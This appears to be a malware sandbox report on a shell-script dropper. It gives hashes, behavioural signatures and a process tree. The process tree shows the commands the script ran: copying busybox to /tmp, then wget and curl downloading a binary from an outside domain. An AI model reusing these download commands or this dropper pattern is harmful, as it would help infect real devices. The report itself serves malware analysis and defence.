Analysis
max time kernel: 148s
max time network: 2s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 15/07/2024, 14:32
Static task: static1

Behavioral task: behavioral1
Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource: ubuntu1804-amd64-20240508-en

Behavioral task: behavioral2
Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource: debian9-armhf-20240418-en

Behavioral task: behavioral3
Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource: debian9-mipsel-20240611-en
General
Target: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Size: 2KB
MD5: 1ffa7d5e3a236cf0d6981d07e1b90406
SHA1: 9bdae03e2410b108144841c466d1e769fea3a9ce
SHA256: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4
SHA512: 6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284
Malware Config
Signatures

Checks CPU configuration (1 TTP, 1 IoC)
Checks CPU information which indicates whether the system is a virtual machine.
  description: File opened for reading | ioc: /proc/cpuinfo | process: curl

Reads runtime system information (3 IoCs)
Reads data from the /proc virtual filesystem.
  description: File opened for reading | ioc: /proc/filesystems | process: cp
  description: File opened for reading | ioc: /proc/sys/crypto/fips_enabled | process: curl
  description: File opened for reading | ioc: /proc/self/auxv | process: curl

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
  description: File opened for modification | ioc: /tmp/busybox | process: cp
Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
  command: /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
  depth: 1
  PID: 645

  /bin/cp (child of PID 645)
    command: cp /bin/busybox /tmp/
    depth: 2
    signatures: Reads runtime system information; Writes file to tmp directory
    PID: 647

  /usr/bin/wget (child of PID 645)
    command: wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
    depth: 2
    PID: 649

  /usr/bin/curl (child of PID 645)
    command: curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
    depth: 2
    signatures: Checks CPU configuration; Reads runtime system information
    PID: 658
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 507KB
MD5: e588bcf03ae78237b58899d35f50c570
SHA1: 2194732ebbefbc27bdae876c77f2a97a20175710
SHA256: 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512: 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555